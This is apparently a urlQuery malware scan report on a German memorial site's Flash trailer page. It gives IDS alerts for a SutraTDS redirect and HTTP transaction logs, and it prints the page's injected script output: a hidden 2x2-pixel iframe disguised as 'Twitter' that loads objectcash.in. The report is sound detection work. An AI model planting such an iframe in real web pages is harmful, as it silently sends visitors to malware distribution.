Overview

URL: http://gedenkstaette-seelower-hoehen.de/flash/trailer.htm
IP: 82.165.122.133
ASN: AS8560 1&1 Internet AG
Location: Germany
Report completed: 2012-11-20 15:53:40 CET
urlQuery Alerts: Detected SutraTDS URL pattern


Settings

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Referer: (none)
Adobe Reader: 8.0
Java: 1.6.0_26


Intrusion Detection Systems

Suricata /w Emerging Threats Pro
Timestamp | Source IP | Destination IP | Severity | Alert
2012-11-20 15:52:33 | 82.165.122.133 | urlQuery Client | 2 | ET CURRENT_EVENTS TDS Sutra - page redirecting to a SutraTDS
2012-11-20 15:52:33 | 82.165.122.133 | urlQuery Client | 1 | ET CURRENT_EVENTS c3284d malware network iframe
2012-11-20 15:52:34 | 82.165.122.133 | urlQuery Client | 3 | FILEMAGIC Macromedia Flash data (compressed),
Snort /w Sourcefire VRT
Timestamp | Source IP | Destination IP | Severity | Alert
2012-11-20 15:52:32 | 82.165.122.133 | urlQuery Client | 1 | MALWARE-CNC TDS Sutra - page redirecting to a SutraTDS


Recent reports on same IP/ASN/Domain

Last 1 reports on IP: 82.165.122.133

Date | Alerts / IDS | URL | IP
2013-01-15 06:35:23 | 0 / 2 | http://gedenkstaette-seelower-hoehen.de/flash/trailer.htm | 82.165.122.133

Last 6 reports on ASN: AS8560 1&1 Internet AG

Date | Alerts / IDS | URL | IP
2013-02-14 01:20:31 | 0 / 0 | http://www.it-analysis.com/b.php?size=468x60&ts=1360790942 | 82.165.196.111
2013-02-14 01:09:43 | 0 / 0 | http://www.rainbowcc.org/ | 74.208.29.232
2013-02-14 00:38:51 | 0 / 0 | http://amefound.org/wp-content/plugins/Airforce-Tongue-Airport/947860/DCCCXXXV/Game/ | 74.208.127.131
2013-02-14 00:19:20 | 0 / 0 | http://www.upcycling.de/qvqvipe/itvwentkxfe7ixr7jum47a9dyptynxk.9pq8yiv3it3 | 212.227.192.145
2013-02-13 23:18:24 | 0 / 0 | http://amefound.org/wp-content/plugins/Airforce-Tongue-Airport/947860/DCCCXXXV/Game/ | 74.208.127.131
2013-02-13 22:59:03 | 0 / 0 | http://74.208.148.35 | 74.208.148.35

Last 1 reports on domain: gedenkstaette-seelower-hoehen.de

Date | Alerts / IDS | URL | IP
2013-01-15 06:35:23 | 0 / 2 | http://gedenkstaette-seelower-hoehen.de/flash/trailer.htm | 82.165.122.133



JavaScript

Executed Scripts (3)


Executed Evals (0)


Executed Writes (1)

#1 JavaScript::Write (size: 139, repeated: 1)

<iframe src="http://objectcash.in/in.cgi?19" name="Twitter" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>


HTTP Transactions (7)


Request:
GET /flash/trailer.htm HTTP/1.1
Host: gedenkstaette-seelower-hoehen.de
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive

Response:
HTTP/1.1 200 OK
Content-Type: text/html
Date: Tue, 20 Nov 2012 14:52:32 GMT
Server: Apache
Last-Modified: Tue, 22 May 2012 06:31:17 GMT
Etag: "c1f289eb-209-4c09a2a7da943"
Accept-Ranges: bytes
Content-Length: 521
Keep-Alive: timeout=2, max=200
Connection: Keep-Alive
Request:
GET /flash/mediaplayer.swf HTTP/1.1
Host: gedenkstaette-seelower-hoehen.de
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://gedenkstaette-seelower-hoehen.de/flash/trailer.htm

Response:
HTTP/1.1 200 OK
Content-Type: application/x-shockwave-flash
Date: Tue, 20 Nov 2012 14:52:33 GMT
Server: Apache
Last-Modified: Tue, 23 Sep 2008 16:22:13 GMT
Etag: "c1f289ed-82c6-4579291fd9740"
Accept-Ranges: bytes
Content-Length: 33478
Keep-Alive: timeout=2, max=199
Connection: Keep-Alive
Request:
GET /get/flashplayer/update/current/xml/version_en_win_pl.xml HTTP/1.1
Host: fpdownload2.macromedia.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive

Response:
HTTP/1.1 200 OK
Content-Type: text/xml
Server: Apache
Last-Modified: Wed, 31 Oct 2012 21:22:10 GMT
Etag: "87de33-256-4cd617ed12480"
Accept-Ranges: bytes
Content-Length: 598
Date: Tue, 20 Nov 2012 14:52:34 GMT
Connection: keep-alive
Request:
GET /favicon.ico HTTP/1.1
Host: gedenkstaette-seelower-hoehen.de
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive

Response:
HTTP/1.1 404 Not Found
Content-Type: text/html
Date: Tue, 20 Nov 2012 14:52:34 GMT
Server: Apache
Content-Length: 640
Keep-Alive: timeout=2, max=200
Connection: Keep-Alive
Request:
GET /favicon.ico HTTP/1.1
Host: gedenkstaette-seelower-hoehen.de
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive

Response:
HTTP/1.1 404 Not Found
Content-Type: text/html
Date: Tue, 20 Nov 2012 14:52:37 GMT
Server: Apache
Content-Length: 640
Keep-Alive: timeout=2, max=200
Connection: Keep-Alive
Request:
GET /flash/seelower_hoehen.flv HTTP/1.1
Host: gedenkstaette-seelower-hoehen.de
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive

Response:
HTTP/1.1 200 OK
Content-Type: video/x-flv
Date: Tue, 20 Nov 2012 14:52:34 GMT
Server: Apache
Last-Modified: Tue, 23 Sep 2008 16:57:08 GMT
Etag: "c1f289ee-605e65c-457930edcc100"
Accept-Ranges: bytes
Content-Length: 101049948
Keep-Alive: timeout=2, max=198
Connection: Keep-Alive
Request:
GET /in.cgi?19 HTTP/1.1
Host: objectcash.in
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://gedenkstaette-seelower-hoehen.de/flash/trailer.htm